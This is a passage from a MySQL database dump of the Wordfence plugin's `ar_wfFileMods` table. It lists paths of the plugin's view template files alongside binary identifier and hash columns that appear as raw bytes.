ީM','',0,'?'),('hx*(&kO','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uyGF,{Xz','%Ԝ5;x^)G(o','',0,'?'),('4ہ;0.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-^A?','axR;,\'K?QߦH','',0,'?'),('m5^u9>','wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PAf0	/ (w1X','IRR\nߎd;I3G','',0,'?'),('1?ox<?6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"5y \"\'f','agLSSPU:̈p5Q<>Fr','',0,'?'),('4ToiEt','wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','䜮`Su8','h]sUsj=(GfvacS','',0,'?'),('2ģ_Dx','wp-content/plugins/wordfence/views/common/block-navigation-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O~}t.K','MNF`\r9ӫrP,Q','',0,'?'),(',@Q','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\"sg4\\(8','@Zn\"ξ~QՔ8sP\073','',0,'?'),('BUjv\\ѣ(','wp-content/plugins/wordfence/views/common/license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y^@:Fgq]p!J','Ѝ]|\\͏\\G$y[\\J\"','',0,'?');
INSERT INTO `ar_wfFileMods` VALUES ('llxL,7WN','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\r$o','l?9Rw\"H^\rs\ZD:Fa','',0,'?'),(']pR/$1','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M#Ƃ,nj9{','+N)¨L	Kz(','',0,'?'),('x|sKa','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2o\0X#83~','$>\n\ZW)O\0(\nݮ\08','',0,'?'),('ˋ_o!\'ur','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')\ZtU2Ec0\'','úM..8ѹ>NwjZWb*B','',0,'?'),('qqC$@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aA\'4=Gg','R{hC;_	G+RzrTz`4','',0,'?'),('%G]f@%Z','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KcDÃ۬','ZJwsh5MEu/jg[-','',0,'?'),('%?)','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w]QVմi','qr*-TN5\rOc;ma','',0,'?'),('w	+j','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',').=g','q4^\"-9\nd1qO,','',0,'?'),('^O|\':QǙE','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q[[_Y[ʛJ{&','nI\Zg[\0MZ1]','',0,'?'),('sՌQ7o','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѿD\0|sW','\n*vQ(Giu3@4*','',0,'?'),('#7rY\0i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%e\rFdE0sB','%MbuI]CI\n6z}B4','',0,'?'),('Dd.P˴{-yog','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mfuֺg-g\0C=v','N<\r;d*8+)\ZbO?0E','',0,'?'),('p̓02@PFtk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}}sJK','a\0k5	-\0oDx۠8u%\'','',0,'?'),('Mx1ǋTmR_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.1(>\ZVE~','Ih棗ht;a6N*z','',0,'?'),('{[/ڑ','wp-content/plugins/wordfence/views/dashboard/option-howgetips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϤSZ2=ǌ^','\0Ԋw\Z)6Zp-lP-ND','',0,'?'),('bE4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z!Hмhڣ','(t$nèOҨ,B@,Lo|','',0,'?'),('~Ⱦ/mր!','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&m:7v=','\nqYۡ>h_P','',0,'?'),('̋qB3aY-','wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6#>{zq\nS%M','pRA7ZQjCpNa=M','',0,'?'),('Q.ì\\XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':nn)','g #ztJȴY12cƳ\"Pow','',0,'?'),(',M;v','wp-content/plugins/wordfence/views/dashboard/options-group-import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=S0lK@^=','υ<URY@*cs','',0,'?'),(' 5rDg籃','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{1i6Lx`3r','žĄDP9Lh҅o-','',0,'?'),(']oMseJ4','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~H`b\0nvB JQ\"','F˲IG6gV)0k','',0,'?'),('PM˝=U','wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raX\'z\05+\"7','v$r_syYU{ؘ?C','',0,'?'),('7\0tt.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an$6\"','tɢC-?\'(uꢦAT-1ba:','',0,'?'),('OSYWz!8ʣj','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*K`;\0}',',cn9۝$O`&pTOXiس','',0,'?'),('QcmuX\Z3B+X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!*o2¯$','TCWD9-Χ0(\ZJi','',0,'?'),('B!vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0͒l\0B',',{=#\nOQݥWpYEY2>X4h','',0,'?'),('mהF@$~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b՗ln','ya2-@\"=*\'','',0,'?'),('/7ñcxpg','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ނ!)(N+U','#Ό|pPҰ,mkyt\r܏@6','',0,'?'),(';%N!9\nL&N','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yuJɶg','l3Ä\ncwx~eLhP\Zے9','',0,'?'),('3,cvk','wp-content/plugins/wordfence/views/onboarding/overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iŮ9e`2','ZMGXL;$xMi|Q%ŽY2$_','',0,'?'),('+\ZDZe}','wp-content/plugins/wordfence/views/onboarding/plugin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kQ4ڌtS*','Qh9\07MN64>\\','',0,'?'),('\'Ac,	~6ܦ','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':% );\0','\Z\'ġ맪.s\'sd4^I','',0,'?'),('Zd*Yژ','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','95IB\"a','VG37R(@\n,\n	w','',0,'?'),('eҕhV\"','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8 5U,e\n4(','S|POdɇ&ٲ-','',0,'?'),(',\ZJ\'AWh','wp-content/plugins/wordfence/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Lgf','_\r\0\0Z}})v[4','',0,'?'),('``\'l`=X(','wp-content/plugins/wordfence/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q5C&','cU3AW\n(:F@zAgG&j9','',0,'?'),(' oƕt_\0.','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','miE>WcZaig','&՚j:g&*56yɨdq4֙','',0,'?'),('Җ6M֦5wH','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}KmwK5 IO','+dn\\/M+{x/(h\Z-z%1r','',0,'?'),('YmRlX\0:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ac[DO+.f\Z','~?\\|q4τ>jW\06wQEg=z[','',0,'?'),('20mK:r²\\0\nB','wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',+[Rֈ','lFVjFlV˱VǞB`','',0,'?'),('d\nv;O1:,Tn','wp-content/plugins/wordfence/views/options/option-toggled-multiple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!0K܃5{PD(','{`α0HoG🨶Mo$P','',0,'?'),('.麉D0uL-c','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B|ssGo1x','\n9VW |:]\\)d^U#','',0,'?'),('$%#_U_d','wp-content/plugins/wordfence/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"p+No+T','Xq?\'Є,Uэf[@aWh','',0,'?'),('\rzDD','wp-content/plugins/wordfence/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z(a|Α]x','͏̽U$q9eg\Zrn_aHC','',0,'?'),('DT[-U','wp-content/plugins/wordfence/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','눣E	xbH$t','Fm0jC,W$=9nԫ','',0,'?'),('*	ą\\','wp-content/plugins/wordfence/views/options/option-toggled.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']KrYwB','knS	3&Y=Ձ_+?Hƪ%','',0,'?'),('7ڔ!2x%XN3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY7o	_Ӏ?',' AQNe\ZywsG@ZI&L','',0,'?'),('몳@ =y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0\"#','֩y\n	ĳXH-<f	c','',0,'?'),('T??:q׮Pah\'','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!߹5HIUw','&V&Yue1H)L?p=~-a','',0,'?'),('Nd#R+r\0s[','wp-content/plugins/wordfence/views/reports/activity-report.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}wu!nU','k\Z>,z>\r\rKMAI;~','',0,'?'),('p{\r %>/Z:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǢϚtpAy','8PciCQVJ+6?pT6\Zzd','',0,'?'),('ܑKݓ%eP^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&#i]<{','EPmh>*HS8SFpXbdU8','',0,'?'),('%|ݽ>?v{j','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':>ޤ+~tͫ*','I|^ψg?nƏAd]68R','',0,'?'),('ep\r}u_4','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Xcb7qNS','MG] ?ugPp1,(V^','',0,'?'),('Du\rɲ\Z','wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4Z?d⢡','1XaRpLrIO%%|\rVge\0-b^n=','',0,'?'),('cG(`E','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' QL','R21?ǌ*=bͥ}X&MƷ','',0,'?'),('$|c \\~','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ;͏(vpoq','z-\0Aj@ 8cT&՞','',0,'?'),('SHLenPq7č','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nZHUϘ','ݓ!#hlts):}*aEglTD','',0,'?'),('ΦHc^)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dd4\'T)','KPUwxd!)n1w<m.ǳf','',0,'?'),('(dwI\0:\rXx1DC','wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y_V^\n%pc','dWgme˰5Ҡ:;W\'','',0,'?'),('\'@S D','wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\Pm@n','4āLsFm\Z^\ZDQ','',0,'?'),(')6#_̟SAF','wp-content/plugins/wordfence/views/scanner/issue-control-repair.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[оڰA9(n','ߑJ[4#~H8ȉB9+/mv','',0,'?'),('u78¸KԊkh','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I6ϲē]','yh;}<6yZ$	M>K(\\#&\"\rej','',0,'?'),('eXǌ.\\(&d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','رm:h\rGZڋY','t8uUUSĒqfS3iiu','',0,'?'),('/0)\Z','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ \nRoN7|','~❃gd&w[uo|t}','',0,'?'),('Xɘy_7XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z.*:î+1','\Zޔeg)QRCAm','',0,'?'),('4\n	m]ĿЊ','wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[+e[eϙfW','QAu&{AiXPK[{0Qk','',0,'?'),('VtS-','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?}Ɠ.Μe1U','MTzX`પmO]$sX','',0,'?'),(';fJ1˘+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0<^=f','s]ѽj$	↜Skik','',0,'?'),('BQaU%','wp-content/plugins/wordfence/views/scanner/issue-knownfile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G^=p=$\Z2','RK6N\"3*\"J/0ix0','',0,'?'),('wei!<sy\n','wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t\"N+՛L','67E0܃ՐC{\\adPb2+pW;P','',0,'?'),('㱛 V9{b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d+l@h','3i]m&	s֯Igeok/M','',0,'?'),('!<B4\ZS}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u@ަ$,','dٍ|]Q!Qw;`7Zf','',0,'?'),('\n#T?׻','wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=3n.ZK7Rb~<','LؖknHN\n$ʨ#','',0,'?'),('H %9lԅE','wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ROIIԥ{','9YZA}7=:\'FoG\'Rɹ_-','',0,'?'),('n[	X}0','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%ؘ5aO_','3½}߈6-x%uv','',0,'?'),('$7y]N','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P<\0cAFLN','R]`[2#XÉi(E\n`rJ','',0,'?'),('$SCkdW','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7^њOi','5QgwBH.f<<Zh&V','',0,'?'),('d0ٷ\ZԌn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<38xuFRĖȦE','n?Qbz	٢)S*,Z','',0,'?'),('\"LJ1C4ND','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jv[pջBM','	)Yt\rb/\Z㲰i\r88','',0,'?'),('=F혣ÆK&','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9:7]6hVo','߫/LkOTbdSEiL9~8','',0,'?'),(',\r	gH6','wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aRp#p','rL-RW&P!aS0T','',0,'?'),(';NQ>','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tvwX\n_Yg!','r;\Z G[i$)v]j7im#','',0,'?'),('rJ<p>Z','wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9¡^-,措Eg','X0\rvfŭ-$ZuYS ','',0,'?'),('|T]:Y$=\'h','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DOۏ~*s/','c^\0]*ζז\\T1msd# ^U','',0,'?'),('L.dDv','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i0j82\ns','v\\qY{S<|+{(m?)D=','',0,'?'),('mavMvK\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tGN8	6','YV)ceW/Zmҳn\'n\0MK~','',0,'?'),('zh9ꈦXp+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|Fe','_?7c:_@EJs[','',0,'?'),('C.yj\0o*f','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dzGf\'Pidi','T1%R2VPRJB\\ˈgen','',0,'?'),('sAsYD]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RYtO`6qz','cV*}zc*(6`=9no${','',0,'?'),('e}0wTnv_g~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',z7\nɲߞ','Ab.hNh|:H-=(1fJ','',0,'?'),('NTZto\r%F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Վ7;__',':Wn%JzW7&NH<\"dKe','',0,'?'),(' ń1r}mJGWR','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iLxЊsf','da16hr76[)ՋOM罒z','',0,'?'),('lxy\Z\"','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ź-܉|JU','V\rc7g6抭VmCP','',0,'?'),('<3v&F','wp-content/plugins/wordfence/views/scanner/scan-failed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eۻ04r','H?MqK-4l_<*=܀ňp+','',0,'?'),('հ	̋ȲS','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' j<c(SCJ','r3H[~2.<_J3{T{XӼPq','',0,'?'),('|]D\Z.E','wp-content/plugins/wordfence/views/scanner/scan-progress-element.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!%IWb','tẁ~sg\n+A}bLNu','',0,'?'),('pխ^@#Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\nrE?m','Qf\0.<:;6\"{N+mE','',0,'?'),('\'_iYm1R','wp-content/plugins/wordfence/views/scanner/scan-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8΂,\\','SHS6p_2*\rTD\0G9','',0,'?'),('4$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0W쮜)Ǣ±','b¥USw툒g:=P','',0,'?'),('F_qCF!o4p','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E `b{{v\r','qFxgTA]Mk^>\'UB','',0,'?'),('D!VD+','wp-content/plugins/wordfence/views/scanner/scan-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Zb4ګ*','w.\0/\"kzvHQ6s&>`KRC','',0,'?'),('KKOfSdiB0Ov','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޑ[.ɕl\\:','&k0lcX**?\rܒ','',0,'?'),('9~\0{@','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',)Rqy|4.','%U<GH[.!e˂t,gsɄ','',0,'?'),('&#pJh','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Is0w4Q','E\"v+󴄏bo}xa{:@E','',0,'?'),('o}C܊8EG','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sTDzҧm','5؄:\"sx4Ҹ\09`\Zi?','',0,'?'),('Ŋ6@L(`','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5w1,5bdvF','g\"g2ߚ}qA?$)d','',0,'?'),('mñ~R?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ONjPv4','m]n>nFf;Gf-m_L4b\'','',0,'?'),('j5fj','wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5_+EG','s}RB|KzI[Y)r','',0,'?'),('/=+HhE14ʆ','wp-content/plugins/wordfence/views/tours/login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v,DWp-Iu)!','pRVs-9<Rꗚ֣uqL','',0,'?'),('֋8[0ʊ','wp-content/plugins/wordfence/views/waf/debug.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FM@i-M','	;B@EŻ߬ue}','',0,'?'),('y66lMC','wp-content/plugins/wordfence/views/waf/firewall-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lw\0i75G','\'WֵDrDBeH\n@\":=!M#f','',0,'?'),('÷g$Ms','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sgb0Cm@X',';<`ҶsfRХC^W^	]<!>','',0,'?'),('@\Z!zrWp','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' {<\Z\0\r\Z$','4fŜ\"\"ł>2L\0\"k1S\nw','',0,'?'),('2X69G3\Z+}A6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ψ-˯3w','G_`8B؎P\n\",\'HŨ','',0,'?'),('zɐ@//@','wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IN~dFe','lBoS)ޥ9o!ǻm#$','',0,'?'),('[Ӄ2W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','03*66-FU.','TQ&n)&MgDgШ','',0,'?'),('K<H<7E,l','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŏqў¯/	\n','W_\rF_H\07	iatr؈M=','',0,'?'),('!y\'Ub#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r0Wò(=','6/E8t*FRH?\"','',0,'?'),('gs)m%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ViK۹v?','-L#syܥjswBt\'ш;8=','',0,'?'),('nAj+uVG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُ8l%','!]`_.\\? .\ZbɐGQe)m','',0,'?'),('=	]}*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$x~)[ڜz','7R N`n^?()^RΚĖ','',0,'?'),('\\H:u3%Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{rb^?','/\\2CeL+:pZ','',0,'?'),('ZDl=컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']cE^GMSf','\\H.T:ďg]B|͌|{=pǵ','',0,'?'),('u[D','wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nγUǩ7PF','f4֒p.Օ*^Nl8A','',0,'?'),('p:,`OlL(A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*sf2','|\rߣ2잿9/%[7m{Eu-','',0,'?'),('Ao\rZԔ_t','wp-content/plugins/wordfence/views/waf/waf-uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wxlMI\0lT㐥